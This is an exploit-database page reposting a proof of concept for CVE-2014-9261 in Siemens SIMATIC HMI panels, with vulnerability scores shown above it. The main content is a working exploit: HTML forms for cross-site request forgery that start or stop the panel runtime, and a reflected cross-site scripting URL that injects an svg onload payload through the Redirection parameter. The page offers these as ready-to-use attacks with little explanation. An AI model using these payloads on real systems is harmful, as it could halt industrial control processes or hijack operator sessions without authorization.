Advertisement






Siemens SIMATIC Panels Cross Site Request Forgery / Cross Site Scripting

CVE Category Price Severity
CVE-2014-9261 CWE-352 $5,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-05-19
CPE
cpe:cpe:/h:siemens:simatic_hmi_panels
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018050131

Below is a copy:

Siemens SIMATIC Panels Cross Site Request Forgery / Cross Site Scripting
# Exploit Title: Siemens SIMATIC Panels Multiple Vulnerability
# Date: 18.05.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.siemens.com/
# Version: Multiple SIMATIC Panels (TP, OP, MP, Mobile, Comfort)
# Greetz: Jameel Nabbo

CSRF PoC

<FORM METHOD="POST" ACTION="http://TargetIP/wwwSiemens
<http://targetip/wwwSiemens>">
<TD>
<INPUT TYPE="submit" VALUE="Start runtime" class="ad_button">
</TD>
<TD>
<INPUT TYPE="hidden" NAME="StartRt">

</TD>
</FORM>
</tr>
<tr>
<FORM METHOD="POST" ACTION="/wwwSiemens">
<TD>
<INPUT TYPE="submit" VALUE="Stop runtime" class="ad_button">
</TD>
<TD>
<INPUT TYPE="hidden" NAME="StopRt">
</TD>
</FORM>


And XSS PoC

http://TargetIP/Templates/Loginpage.html?Realm=FileBrowserUser&Redirection=
<http://targetip/Templates/Loginpage.html?Realm=FileBrowserUser&Redirection=>"/><svg/onload=prompt(/XSS/)>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum